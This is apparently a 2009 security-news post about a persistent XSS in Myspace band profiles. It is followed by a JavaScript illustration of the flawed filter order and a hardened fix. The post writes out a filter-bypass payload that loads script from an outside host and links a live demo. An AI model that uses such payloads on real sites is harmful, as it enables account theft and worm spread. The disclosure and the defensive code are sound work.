
 Myspace.com hit by a Permanent XSS

Written by KF

Wednesday, 28 January 2009

Note 02/02/09: TrainReq (Josh Holly) reportedly discovered the vulnerability first, in the film profiles.

Daniel Lo Nigro has discovered a trick to bypass the Myspace filters and insert a script into a Myspace band profile. Myspace prevents <script> from being written in a band website URL, but it also strips "http://" out of the URL. Placing "http://" inside the tag name lets the stripped result form a working <script> tag, so it can be exploited this way:

URL: test.com?<scrihttp://pt src=//site.com/xss.js>

Or have a look at Daniel's harmless example:

http://www.myspace.com/index.cfm?fuseaction=user.viewprofile&friendID=446695851

Daniel says he alerted Myspace but that they never answered him.

Here is the mirror of the XSS:

http://xssed.com/mirror/57181/

This XSS could be exploited to spread a worm, steal Myspace accounts, etc.

In the past Myspace was hit by a number of security issues, including the "Samy" XSS worm.
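The filter-ordering flaw described above, shown next to a corrected version. This is an added example, not Myspace's code: the function names and the exact filter logic are assumptions inferred from the article's description, and the only sample input is the URL string quoted in the article.

```javascript
// Added illustration. Names and logic are hypothetical, inferred from the article.

// Flawed order: validate first, transform afterwards. The check runs on a
// string that is not the one finally stored and rendered.
function flawedFilter(url) {
  if (/<\s*script/i.test(url)) return null;   // reject an obvious script tag
  return url.replace(/http:\/\//gi, "");       // then strip the scheme, once
}

// Strip the scheme repeatedly until the string stops changing, so a removal
// cannot leave behind something that a later pass would have caught.
function normalize(url) {
  let prev;
  do {
    prev = url;
    url = url.replace(/http:\/\//gi, "");
  } while (url !== prev);
  return url;
}

// Corrected order: normalize to a fixed point, then validate the final value.
// A URL field has no need for markup characters or whitespace, so reject them.
function hardenedFilter(url) {
  const cleaned = normalize(url);
  return /[<>"'`\s]/.test(cleaned) ? null : cleaned;
}

// Output encoding is the second layer: even a value that slipped past input
// filtering is rendered as text, not markup.
function htmlEncode(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

// Sample input: the URL value quoted in the article.
const sample = "test.com?<scrihttp://pt src=//site.com/xss.js>";

function demo() {
  return {
    flawed: flawedFilter(sample),               // tag is reassembled by the strip
    hardened: hardenedFilter(sample),           // rejected after normalization
    encoded: htmlEncode(flawedFilter(sample)),  // inert when encoded on output
  };
}

console.log(demo());
```
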


        